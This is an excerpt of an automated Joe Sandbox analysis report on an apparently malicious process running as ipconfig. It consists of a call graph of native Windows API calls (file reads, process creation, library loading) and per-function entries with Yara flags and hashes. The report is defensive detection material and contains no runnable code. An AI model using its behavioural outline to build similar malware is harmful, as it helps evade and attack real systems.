1d9c5b 101843->101844 101845 1eb5a0 LdrLoadDll 101844->101845 101846 1d9c71 101845->101846 101847 1df180 101846->101847 101848 1df199 101847->101848 102241 1db040 101848->102241 101850 1df1ac 102245 1ea1e0 101850->102245 101853 1d9d65 101853->101773 101855 1df1d2 101856 1df1fd 101855->101856 102251 1ea260 101855->102251 101858 1ea490 2 API calls 101856->101858 101858->101853 101860 1e8bcf 101859->101860 101884 1e4e50 101860->101884 101862 1d9ca3 101863 1e8a70 101862->101863 101890 1ea600 101863->101890 101867 1eb2c9 101866->101867 101897 1e4a50 101867->101897 101869 1eb2e1 101870 1eb2ea 101869->101870 101936 1eb0f0 101869->101936 101870->101834 101872 1eb2fe 101872->101870 101954 1e9f00 101872->101954 102210 1d7ea0 101877->102210 101879 1d9ad1 101879->101836 101880 1d9aca 101880->101879 102223 1d8160 101880->102223 101883->101838 101885 1e4e6a 101884->101885 101886 1e4e5e 101884->101886 101885->101862 101886->101885 101889 1e52d0 LdrLoadDll 101886->101889 101888 1e4fbc 101888->101862 101889->101888 101893 1eaf60 101890->101893 101892 1e8a85 101892->101832 101894 1eaf70 101893->101894 101896 1eaf92 101893->101896 101895 1e4e50 LdrLoadDll 101894->101895 101895->101896 101896->101892 101898 1e4d85 101897->101898 101908 1e4a64 101897->101908 101898->101869 101901 1e4b73 102022 1ea460 LdrLoadDll 101901->102022 101902 1e4b90 101965 1ea360 101902->101965 101905 1e4bb7 101907 1ebdc0 2 API calls 101905->101907 101906 1e4b7d 101906->101869 101911 1e4bc3 101907->101911 101908->101898 101962 1e9c50 101908->101962 101909 1e4d49 101912 1ea490 2 API calls 101909->101912 101910 1e4d5f 102031 1e4790 LdrLoadDll NtReadFile NtClose 101910->102031 101911->101906 101911->101909 101911->101910 101916 1e4c52 101911->101916 101913 1e4d50 101912->101913 101913->101869 101915 1e4d72 101915->101869 101917 1e4cb9 101916->101917 101919 1e4c61 101916->101919 101917->101909 101918 1e4ccc 101917->101918 102024 1ea2e0 101918->102024 101921 1e4c7a 101919->101921 101922 1e4c66 101919->101922 101925 1e4c7f 101921->101925 101926 1e4c97 101921->101926 102023 1e4650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 101922->102023 101968 1e46f0 101925->101968 101926->101913 101980 1e4410 101926->101980 101928 1e4c70 101928->101869 101930 1e4d2c 102028 1ea490 101930->102028 101931 1e4c8d 101931->101869 101933 1e4caf 101933->101869 101935 1e4d38 101935->101869 101937 1eb101 101936->101937 101938 1eb113 101937->101938 102049 1ebd40 101937->102049 101938->101872 101940 1eb134 102052 1e4070 101940->102052 101942 1eb180 101942->101872 101943 1eb157 101943->101942 101944 1e4070 3 API calls 101943->101944 101946 1eb179 101944->101946 101946->101942 102084 1e5390 101946->102084 101947 1eb20a 101948 1eb21a 101947->101948 102178 1eaf00 LdrLoadDll 101947->102178 102094 1ead70 101948->102094 101951 1eb248 102173 1e9ec0 101951->102173 101955 1e9f1c 101954->101955 101956 1eaf60 LdrLoadDll 101954->101956 102204 2cf2c0a 101955->102204 101956->101955 101957 1e9f37 101959 1ebdc0 101957->101959 102207 1ea670 101959->102207 101961 1eb359 101961->101834 101963 1eaf60 LdrLoadDll 101962->101963 101964 1e4b44 101963->101964 101964->101901 101964->101902 101964->101906 101966 1ea37c NtCreateFile 101965->101966 101967 1eaf60 LdrLoadDll 101965->101967 101966->101905 101967->101966 101969 1e470c 101968->101969 101970 1ea2e0 LdrLoadDll 101969->101970 101971 1e472d 101970->101971 101972 1e4748 101971->101972 101973 1e4734 101971->101973 101975 1ea490 2 API calls 101972->101975 101974 1ea490 2 API calls 101973->101974 101976 1e473d 101974->101976 101977 1e4751 101975->101977 101976->101931 102032 1ebfd0 LdrLoadDll RtlAllocateHeap 101977->102032 101979 1e475c 101979->101931 101981 1e448e 101980->101981 101982 1e445b 101980->101982 101984 1e45d9 101981->101984 101987 1e44aa 101981->101987 101983 1ea2e0 LdrLoadDll 101982->101983 101985 1e4476 101983->101985 101986 1ea2e0 LdrLoadDll 101984->101986 101988 1ea490 2 API calls 101985->101988 101992 1e45f4 101986->101992 101989 1ea2e0 LdrLoadDll 101987->101989 101990 1e447f 101988->101990 101991 1e44c5 101989->101991 101990->101933 101994 1e44cc 101991->101994 101995 1e44e1 101991->101995 102045 1ea320 LdrLoadDll 101992->102045 101997 1ea490 2 API calls 101994->101997 101998 1e44fc 101995->101998 101999 1e44e6 101995->101999 101996 1e462e 102000 1ea490 2 API calls 101996->102000 102001 1e44d5 101997->102001 102007 1e4501 101998->102007 102033 1ebf90 101998->102033 102002 1ea490 2 API calls 101999->102002 102003 1e4639 102000->102003 102001->101933 102004 1e44ef 102002->102004 102003->101933 102004->101933 102009 1e4513 102007->102009 102036 1ea410 102007->102036 102008 1e4567 102010 1e457e 102008->102010 102044 1ea2a0 LdrLoadDll 102008->102044 102009->101933 102012 1e459a 102010->102012 102013 1e4585 102010->102013 102014 1ea490 2 API calls 102012->102014 102015 1ea490 2 API calls 102013->102015 102016 1e45a3 102014->102016 102015->102009 102017 1e45cf 102016->102017 102039 1ebb90 102016->102039 102017->101933 102019 1e45ba 102020 1ebdc0 2 API calls 102019->102020 102021 1e45c3 102020->102021 102021->101933 102022->101906 102023->101928 102025 1eaf60 LdrLoadDll 102024->102025 102026 1e4d14 102025->102026 102027 1ea320 LdrLoadDll 102026->102027 102027->101930 102029 1eaf60 LdrLoadDll 102028->102029 102030 1ea4ac NtClose 102029->102030 102030->101935 102031->101915 102032->101979 102046 1ea630 102033->102046 102035 1ebfa8 102035->102007 102037 1eaf60 LdrLoadDll 102036->102037 102038 1ea42c NtReadFile 102037->102038 102038->102008 102040 1ebbb4 102039->102040 102041 1ebb9d 102039->102041 102040->102019 102041->102040 102042 1ebf90 2 API calls 102041->102042 102043 1ebbcb 102042->102043 102043->102019 102044->102010 102045->101996 102047 1eaf60 LdrLoadDll 102046->102047 102048 1ea64c RtlAllocateHeap 102047->102048 102048->102035 102050 1ebd6d 102049->102050 102179 1ea540 LdrLoadDll 102049->102179 102050->101940 102053 1e4081 102052->102053 102054 1e4089 102052->102054 102053->101943 102083 1e435c 102054->102083 102180 1ecf30 102054->102180 102056 1e40dd 102057 1ecf30 2 API calls 102056->102057 102060 1e40e8 102057->102060 102058 1e4136 102061 1ecf30 2 API calls 102058->102061 102060->102058 102185 1ecfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 102060->102185 102186 1ed060 102060->102186 102064 1e414a 102061->102064 102063 1e41a7 102065 1ecf30 2 API calls 102063->102065 102064->102063 102067 1ed060 3 API calls 102064->102067 102066 1e41bd 102065->102066 102068 1e41fa 102066->102068 102070 1ed060 3 API calls 102066->102070 102067->102064 102069 1ecf30 2 API calls 102068->102069 102071 1e4205 102069->102071 102070->102066 102072 1ed060 3 API calls 102071->102072 102075 1e423f 102071->102075 102072->102071 102074 1e4334 102193 1ecf90 LdrLoadDll RtlFreeHeap 102074->102193 102192 1ecf90 LdrLoadDll RtlFreeHeap 102075->102192 102077 1e433e 102194 1ecf90 LdrLoadDll RtlFreeHeap 102077->102194 102079 1e4348 102195 1ecf90 LdrLoadDll RtlFreeHeap 102079->102195 102081 1e4352 102196 1ecf90 LdrLoadDll RtlFreeHeap 102081->102196 102083->101943 102085 1e53a1 102084->102085 102086 1e4a50 8 API calls 102085->102086 102087 1e53b7 102086->102087 102088 1e5405 102087->102088 102089 1e53f2 102087->102089 102093 1e540a 102087->102093 102091 1ebdc0 2 API calls 102088->102091 102090 1ebdc0 2 API calls 102089->102090 102092 1e53f7 102090->102092 102091->102093 102092->101947 102093->101947 102197 1eac30 102094->102197 102097 1eac30 LdrLoadDll 102098 1ead8d 102097->102098 102099 1eac30 LdrLoadDll 102098->102099 102100 1ead96 102099->102100 102101 1eac30 LdrLoadDll 102100->102101 102102 1ead9f 102101->102102 102103 1eac30 LdrLoadDll 102102->102103 102104 1eada8 102103->102104 102105 1eac30 LdrLoadDll 102104->102105 102106 1eadb1 102105->102106 102107 1eac30 LdrLoadDll 102106->102107 102108 1eadbd 102107->102108 102109 1eac30 LdrLoadDll 102108->102109 102110 1eadc6 102109->102110 102111 1eac30 LdrLoadDll 102110->102111 102112 1eadcf 102111->102112 102113 1eac30 LdrLoadDll 102112->102113 102114 1eadd8 102113->102114 102115 1eac30 LdrLoadDll 102114->102115 102116 1eade1 102115->102116 102117 1eac30 LdrLoadDll 102116->102117 102118 1eadea 102117->102118 102119 1eac30 LdrLoadDll 102118->102119 102120 1eadf6 102119->102120 102121 1eac30 LdrLoadDll 102120->102121 102122 1eadff 102121->102122 102123 1eac30 LdrLoadDll 102122->102123 102124 1eae08 102123->102124 102125 1eac30 LdrLoadDll 102124->102125 102126 1eae11 102125->102126 102127 1eac30 LdrLoadDll 102126->102127 102128 1eae1a 102127->102128 102129 1eac30 LdrLoadDll 102128->102129 102130 1eae23 102129->102130 102131 1eac30 LdrLoadDll 102130->102131 102132 1eae2f 102131->102132 102133 1eac30 LdrLoadDll 102132->102133 102134 1eae38 102133->102134 102135 1eac30 LdrLoadDll 102134->102135 102136 1eae41 102135->102136 102137 1eac30 LdrLoadDll 102136->102137 102138 1eae4a 102137->102138 102139 1eac30 LdrLoadDll 102138->102139 102140 1eae53 102139->102140 102141 1eac30 LdrLoadDll 102140->102141 102142 1eae5c 102141->102142 102143 1eac30 LdrLoadDll 102142->102143 102144 1eae68 102143->102144 102145 1eac30 LdrLoadDll 102144->102145 102146 1eae71 102145->102146 102147 1eac30 LdrLoadDll 102146->102147 102148 1eae7a 102147->102148 102149 1eac30 LdrLoadDll 102148->102149 102150 1eae83 102149->102150 102151 1eac30 LdrLoadDll 102150->102151 102152 1eae8c 102151->102152 102153 1eac30 LdrLoadDll 102152->102153 102154 1eae95 102153->102154 102155 1eac30 LdrLoadDll 102154->102155 102156 1eaea1 102155->102156 102157 1eac30 LdrLoadDll 102156->102157 102158 1eaeaa 102157->102158 102159 1eac30 LdrLoadDll 102158->102159 102160 1eaeb3 102159->102160 102161 1eac30 LdrLoadDll 102160->102161 102162 1eaebc 102161->102162 102163 1eac30 LdrLoadDll 102162->102163 102164 1eaec5 102163->102164 102165 1eac30 LdrLoadDll 102164->102165 102166 1eaece 102165->102166 102167 1eac30 LdrLoadDll 102166->102167 102168 1eaeda 102167->102168 102169 1eac30 LdrLoadDll 102168->102169 102170 1eaee3 102169->102170 102171 1eac30 LdrLoadDll 102170->102171 102172 1eaeec 102171->102172 102172->101951 102174 1eaf60 LdrLoadDll 102173->102174 102175 1e9edc 102174->102175 102203 2cf2df0 LdrInitializeThunk 102175->102203 102176 1e9ef3 102176->101872 102178->101948 102179->102050 102181 1ecf46 102180->102181 102182 1ecf40 102180->102182 102183 1ebf90 2 API calls 102181->102183 102182->102056 102184 1ecf6c 102183->102184 102184->102056 102185->102060 102187 1ecfd0 102186->102187 102188 1ed02d 102187->102188 102189 1ebf90 2 API calls 102187->102189 102188->102060 102190 1ed00a 102189->102190 102191 1ebdc0 2 API calls 102190->102191 102191->102188 102192->102074 102193->102077 102194->102079 102195->102081 102196->102083 102198 1eac4b 102197->102198 102199 1e4e50 LdrLoadDll 102198->102199 102200 1eac6b 102199->102200 102201 1e4e50 LdrLoadDll 102200->102201 102202 1ead17 102200->102202 102201->102202 102202->102097 102203->102176 102205 2cf2c1f LdrInitializeThunk 102204->102205 102206 2cf2c11 102204->102206 102205->101957 102206->101957 102208 1eaf60 LdrLoadDll 102207->102208 102209 1ea68c RtlFreeHeap 102208->102209 102209->101961 102211 1d7eab 102210->102211 102212 1d7eb0 102210->102212 102211->101880 102213 1ebd40 LdrLoadDll 102212->102213 102219 1d7ed5 102213->102219 102214 1d7f38 102214->101880 102215 1e9ec0 2 API calls 102215->102219 102216 1d7f3e 102218 1d7f64 102216->102218 102220 1ea5c0 2 API calls 102216->102220 102218->101880 102219->102214 102219->102215 102219->102216 102221 1ebd40 LdrLoadDll 102219->102221 102226 1ea5c0 102219->102226 102222 1d7f55 102220->102222 102221->102219 102222->101880 102224 1d817e 102223->102224 102225 1ea5c0 2 API calls 102223->102225 102224->101836 102225->102224 102227 1eaf60 LdrLoadDll 102226->102227 102228 1ea5dc 102227->102228 102231 2cf2c70 LdrInitializeThunk 102228->102231 102229 1ea5f3 102229->102219 102231->102229 102233 1eb5c3 102232->102233 102236 1dacf0 102233->102236 102235 1d9c4a 102235->101843 102238 1dad14 102236->102238 102237 1dad1b 102237->102235 102238->102237 102239 1dad67 102238->102239 102240 1dad50 LdrLoadDll 102238->102240 102239->102235 102240->102239 102242 1db063 102241->102242 102244 1db0e0 102242->102244 102256 1e9c90 LdrLoadDll 102242->102256 102244->101850 102246 1eaf60 LdrLoadDll 102245->102246 102247 1df1bb 102246->102247 102247->101853 102248 1ea7d0 102247->102248 102249 1eaf60 LdrLoadDll 102248->102249 102250 1ea7ef LookupPrivilegeValueW 102249->102250 102250->101855 102252 1ea27c 102251->102252 102253 1eaf60 LdrLoadDll 102251->102253 102257 2cf2ea0 LdrInitializeThunk 102252->102257 102253->102252 102254 1ea29b 102254->101856 102256->102244 102257->102254 102259 1db1f0 102258->102259 102260 1db040 LdrLoadDll 102259->102260 102261 1db204 102260->102261 102261->101789 102263 1daf34 102262->102263 102335 1e9c90 LdrLoadDll 102263->102335 102265 1daf6e 102265->101791 102267 1df3ac 102266->102267 102268 1db1c0 LdrLoadDll 102267->102268 102269 1df3be 102268->102269 102336 1df290 102269->102336 102272 1df3d9 102274 1df3e4 102272->102274 102276 1ea490 2 API calls 102272->102276 102273 1df3f1 102275 1df402 102273->102275 102277 1ea490 2 API calls 102273->102277 102274->101795 102275->101795 102276->102274 102277->102275 102279 1df43c 102278->102279 102355 1db2b0 102279->102355 102281 1df44e 102282 1df290 3 API calls 102281->102282 102283 1df45f 102282->102283 102284 1df469 102283->102284 102285 1df481 102283->102285 102286 1df474 102284->102286 102288 1ea490 2 API calls 102284->102288 102287 1df492 102285->102287 102289 1ea490 2 API calls 102285->102289 102286->101797 102287->101797 102288->102286 102289->102287 102291 1dcaa6 102290->102291 102292 1dcab0 102290->102292 102291->101805 102293 1daf10 LdrLoadDll 102292->102293 102294 1dcb4e 102293->102294 102295 1dcb74 102294->102295 102296 1db040 LdrLoadDll 102294->102296 102295->101805 102297 1dcb90 102296->102297 102298 1e4a50 8 API calls 102297->102298 102299 1dcbe5 102298->102299 102299->101805 102301 1dd646 102300->102301 102302 1db040 LdrLoadDll 102301->102302 102303 1dd65a 102302->102303 102359 1dd310 102303->102359 102305 1d908b 102306 1dcc00 102305->102306 102307 1dcc26 102306->102307 102308 1db040 LdrLoadDll 102307->102308 102309 1dcca9 102307->102309 102308->102309 102310 1db040 LdrLoadDll 102309->102310 102311 1dcd16 102310->102311 102312 1daf10 LdrLoadDll 102311->102312 102313 1dcd7f 102312->102313 102314 1db040 LdrLoadDll 102313->102314 102315 1dce2f 102314->102315 102315->101818 102319 1d8d14 102316->102319 102388 1df6d0 102316->102388 102318 1d8f25 102318->101776 102319->102318 102393 1e43a0 102319->102393 102321 1d8d70 102321->102318 102396 1d8ab0 102321->102396 102324 1ecf30 2 API calls 102325 1d8db2 102324->102325 102326 1ed060 3 API calls 102325->102326 102330 1d8dc7 102326->102330 102327 1d7ea0 3 API calls 102327->102330 102330->102318 102330->102327 102331 1d8160 2 API calls 102330->102331 102332 1dc7b0 16 API calls 102330->102332 102401 1df670 102330->102401 102405 1df080 19 API calls 102330->102405 102331->102330 102332->102330 102333->101793 102334->101815 102335->102265 102337 1df2aa 102336->102337 102345 1df360 102336->102345 102338 1db040 LdrLoadDll 102337->102338 102339 1df2cc 102338->102339 102346 1e9f40 102339->102346 102341 1df30e 102349 1e9f80 102341->102349 102344 1ea490 2 API calls 102344->102345 102345->102272 102345->102273 102347 1e9f5c 102346->102347 102348 1eaf60 LdrLoadDll 102346->102348 102347->102341 102348->102347 102350 1eaf60 LdrLoadDll 102349->102350 102351 1e9f9c 102350->102351 102354 2cf35c0 LdrInitializeThunk 102351->102354 102352 1df354 102352->102344 102354->102352 102356 1db2d7 102355->102356 102357 1db040 LdrLoadDll 102356->102357 102358 1db313 102357->102358 102358->102281 102360 1dd327 102359->102360 102368 1df710 102360->102368 102364 1dd39b 102365 1dd3a2 102364->102365 102379 1ea2a0 LdrLoadDll 102364->102379 102365->102305 102367 1dd3b5 102367->102305 102369 1df735 102368->102369 102380 1d81a0 102369->102380 102371 1dd36f 102376 1ea6e0 102371->102376 102372 1e4a50 8 API calls 102374 1df759 102372->102374 102374->102371 102374->102372 102375 1ebdc0 2 API calls 102374->102375 102387 1df550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 102374->102387 102375->102374 102377 1eaf60 LdrLoadDll 102376->102377 102378 1ea6ff CreateProcessInternalW 102377->102378 102378->102364 102379->102367 102381 1d829f 102380->102381 102382 1d81b5 102380->102382 102381->102374 102382->102381 102383 1e4a50 8 API calls 102382->102383 102384 1d8222 102383->102384 102385 1ebdc0 2 API calls 102384->102385 102386 1d8249 102384->102386 102385->102386 102386->102374 102387->102374 102389 1e4e50 LdrLoadDll 102388->102389 102390 1df6ef 102389->102390 102391 1df6fd 102390->102391 102392 1df6f6 SetErrorMode 102390->102392 102391->102319 102392->102391 102406 1df4a0 102393->102406 102395 1e43c6 102395->102321 102397 1ebd40 LdrLoadDll 102396->102397 102398 1d8ad5 102397->102398 102399 1d8cea 102398->102399 102425 1e9880 102398->102425 102399->102324 102402 1df683 102401->102402 102473 1e9e90 102402->102473 102405->102330 102407 1df4bd 102406->102407 102413 1e9fc0 102407->102413 102410 1df505 102410->102395 102414 1e9fdc 102413->102414 102415 1eaf60 LdrLoadDll 102413->102415 102423 2cf2f30 LdrInitializeThunk 102414->102423 102415->102414 102416 1df4fe 102416->102410 102418 1ea010 102416->102418 102419 1eaf60 LdrLoadDll 102418->102419 102420 1ea02c 102419->102420 102424 2cf2d10 LdrInitializeThunk 102420->102424 102421 1df52e 102421->102395 102423->102416 102424->102421 102426 1ebf90 2 API calls 102425->102426 102427 1e9897 102426->102427 102446 1d9310 102427->102446 102429 1e98b2 102430 1e98d9 102429->102430 102431 1e98f0 102429->102431 102432 1ebdc0 2 API calls 102430->102432 102433 1ebd40 LdrLoadDll 102431->102433 102434 1e98e6 102432->102434 102435 1e992a 102433->102435 102434->102399 102436 1ebd40 LdrLoadDll 102435->102436 102437 1e9943 102436->102437 102442 1e9be4 102437->102442 102452 1ebd80 LdrLoadDll 102437->102452 102439 1e9bc9 102440 1e9bd0 102439->102440 102439->102442 102441 1ebdc0 2 API calls 102440->102441 102443 1e9bda 102441->102443 102444 1ebdc0 2 API calls 102442->102444 102443->102399 102445 1e9c39 102444->102445 102445->102399 102447 1d9335 102446->102447 102448 1dacf0 LdrLoadDll 102447->102448 102449 1d9368 102448->102449 102451 1d938d 102449->102451 102453 1dcf20 102449->102453 102451->102429 102452->102439 102454 1dcf4c 102453->102454 102455 1ea1e0 LdrLoadDll 102454->102455 102456 1dcf65 102455->102456 102457 1dcf6c 102456->102457 102464 1ea220 102456->102464 102457->102451 102461 1dcfa7 102462 1ea490 2 API calls 102461->102462 102463 1dcfca 102462->102463 102463->102451 102465 1ea23c 102464->102465 102466 1eaf60 LdrLoadDll 102464->102466 102472 2cf2ca0 LdrInitializeThunk 102465->102472 102466->102465 102467 1dcf8f 102467->102457 102469 1ea810 102467->102469 102470 1eaf60 LdrLoadDll 102469->102470 102471 1ea82f 102470->102471 102471->102461 102472->102467 102474 1eaf60 LdrLoadDll 102473->102474 102475 1e9eac 102474->102475 102478 2cf2dd0 LdrInitializeThunk 102475->102478 102476 1df6ae 102476->102330 102478->102476 102479 1e9080 102480 1ebd40 LdrLoadDll 102479->102480 102482 1e90bb 102479->102482 102480->102482 102481 1e919c 102482->102481 102483 1dacf0 LdrLoadDll 102482->102483 102484 1e90f1 102483->102484 102485 1e4e50 LdrLoadDll 102484->102485 102487 1e910d 102485->102487 102486 1e9120 Sleep 102486->102487 102487->102481 102487->102486 102490 1e8ca0 LdrLoadDll 102487->102490 102491 1e8eb0 LdrLoadDll 102487->102491 102490->102487 102491->102487 102492 2cf2ad0 LdrInitializeThunk

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 283 1ea360-1ea376 284 1ea37c-1ea3b1 NtCreateFile 283->284 285 1ea377 call 1eaf60 283->285 285->284
                                                                                              APIs
                                                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,001E4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001E4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 001EA3AD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID: .z`
                                                                                              • API String ID: 823142352-1441809116
                                                                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                              • Instruction ID: e72a3dbb3a0b321610b1153245910af92602264eb0d97e36aa528d1c853e3895
                                                                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                              • Instruction Fuzzy Hash: 48F0BDB2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630F8118BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 286 1ea35c-1ea3b1 call 1eaf60 NtCreateFile
                                                                                              APIs
                                                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,001E4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001E4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 001EA3AD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID: .z`
                                                                                              • API String ID: 823142352-1441809116
                                                                                              • Opcode ID: 0f551066871a270168d0ff2483714f43a096202a8d74b98515230281910a7744
                                                                                              • Instruction ID: 14815ca02a0283d6805c16cfb500992e201a19a57f88e6392d3cd522a49bcfd1
                                                                                              • Opcode Fuzzy Hash: 0f551066871a270168d0ff2483714f43a096202a8d74b98515230281910a7744
                                                                                              • Instruction Fuzzy Hash: 34F0C4B2214149ABCB08DFA9D884CEB77A9FF8C754B15865DFA1D93206D630E8518BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • NtReadFile.NTDLL(001E4D72,5EB65239,FFFFFFFF,001E4A31,?,?,001E4D72,?,001E4A31,FFFFFFFF,5EB65239,001E4D72,?,00000000), ref: 001EA455
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                              • Instruction ID: f1dec8f34f912fa7877fa57f3876a16d2a075c3facfa82a95aabbc66086a3941
                                                                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                              • Instruction Fuzzy Hash: A4F0A4B2200208ABCB14DF99DC81EEB77ADEF8C754F158248BA1D97241D630E8118BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • NtReadFile.NTDLL(001E4D72,5EB65239,FFFFFFFF,001E4A31,?,?,001E4D72,?,001E4A31,FFFFFFFF,5EB65239,001E4D72,?,00000000), ref: 001EA455
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: bf50eeb7deebf2a486485ec1f43aa719086f10b8b0234e11c84567ca45339589
                                                                                              • Instruction ID: 11ffb0b00be11898c541d1ba2ae9b5c5ed278d8919aee2287539cc31f801a94d
                                                                                              • Opcode Fuzzy Hash: bf50eeb7deebf2a486485ec1f43aa719086f10b8b0234e11c84567ca45339589
                                                                                              • Instruction Fuzzy Hash: 9DF01DB2114049AFCB04DF99D880CEBB7ADEF8C214B15864DF95C97201C630E855CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • NtClose.NTDLL(001E4D50,?,?,001E4D50,00000000,FFFFFFFF), ref: 001EA4B5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID:
                                                                                              • API String ID: 3535843008-0
                                                                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                              • Instruction ID: e46a71c2fb63ad5d1fdb74bedb57f61b4e474f129dca2e0c6a1db3eabb361b01
                                                                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                              • Instruction Fuzzy Hash: 57D01275200214ABD710EB99CC45E9B775CEF44750F154455BA185B242C530F50086E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: a81fdb35940776d27a2db810196acfcc61e031ffd67bac6853a7411bb92678d2
                                                                                              • Instruction ID: c1d2da1b5a120fdc5c3c812b6e9b661866899a37cc2843cde30be114a3b8d4a6
                                                                                              • Opcode Fuzzy Hash: a81fdb35940776d27a2db810196acfcc61e031ffd67bac6853a7411bb92678d2
                                                                                              • Instruction Fuzzy Hash: 7B900225215800430205B5590744607004687D5351355C021F10196B5CD6218D616121
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: cdb9d83ab7cf241f80391ae4f3d23024ac1c3d3e636bbb823ce9de11a0fe85e9
                                                                                              • Instruction ID: 4fdb2d66a7af03e6e240761f442a4422e4e27d5cbdc29478eab736659f6e7d82
                                                                                              • Opcode Fuzzy Hash: cdb9d83ab7cf241f80391ae4f3d23024ac1c3d3e636bbb823ce9de11a0fe85e9
                                                                                              • Instruction Fuzzy Hash: 6690026120680043420571594454717400A87E0201B55C021E10186F5DC5258D917125
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
